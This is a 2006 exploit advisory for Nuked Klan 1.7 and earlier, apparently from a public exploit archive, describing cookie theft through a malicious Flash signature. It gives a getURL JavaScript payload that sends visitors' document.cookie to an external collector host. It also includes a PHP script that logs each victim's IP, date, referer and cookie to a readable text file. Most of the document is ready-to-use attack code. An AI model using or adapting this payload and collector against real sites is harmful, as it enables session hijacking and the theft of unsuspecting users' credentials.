nukedklan17.txt

`[-] Nuked Klan <= 1.7 Remote Cookie Disclosure Exploit  
[-] Vendor : www.nuked-klan.org/  
[-] Found by NeoSSJ & Kad'  
[-] Full disclosure on 31 December 2006  
  
[-] Notice :   
  
you only have to create a *.swf file, and you put on :   
  
getURL("javascript:alert('document.location="http://site.com/cookie.php?cookie="+document.cookie');");   
  
or anything like that to have the cookie of all the persons who will see the cookie :   
  
[-] Exploitation :   
getURL("javascript:document.location='http://site.com/cookie.php?cookie='+document.cookie");  
  
the php script is anything like that :  
  
<?php  
$cookie = $_GET['cookie'];  
$ip = getenv ('REMOTE_ADDR');  
$date=date("m/d/Y g:i:s a");  
$referer=getenv ('HTTP_REFERER');  
$fl = fopen('cookies.txt', 'a');  
fwrite($fl, "\n".$ip.' :: '.$date."\n".$referer." :: ".$cookie."\n");  
fclose($fl);  
?>  
  
then you only have to go to http://site.com/cookies.txt, and you have the cookies of   
all the persons who have seen your signature   
  
  
Greetz to : Macromedia Flash Software, and every body who know us.  
`